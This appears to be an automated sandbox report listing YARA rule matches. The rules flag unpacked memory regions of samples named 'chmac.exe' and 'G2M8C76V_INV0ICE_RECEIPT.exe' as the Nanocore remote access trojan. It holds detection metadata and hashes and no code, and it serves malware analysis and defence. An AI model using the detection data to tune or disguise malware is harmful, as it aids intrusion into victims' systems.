Source: 15.2.chmac.exe.2551458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 15.2.chmac.exe.2551458.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.37ac01e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.37ac01e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.37ac01e.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.chmac.exe.3011458.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.chmac.exe.3011458.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.chmac.exe.3011458.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.37b547d.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.37b547d.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.3960e54.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.3960e54.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.3733258.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.3733258.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.3733258.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.chmac.exe.3000000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.chmac.exe.3000000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.chmac.exe.3000000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.50a9b8.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.50a9b8.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.50a9b8.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.chmac.exe.3960e54.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.3960e54.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.2260000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.2260000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.2260000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.2260000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.2260000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.2260000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.chmac.exe.2500000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.2500000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.2500000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.chmac.exe.24b0000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.24b0000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.24b0000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 15.2.chmac.exe.2551458.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.chmac.exe.2551458.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 15.2.chmac.exe.2551458.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.chmac.exe.395c01e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.395c01e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.395c01e.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
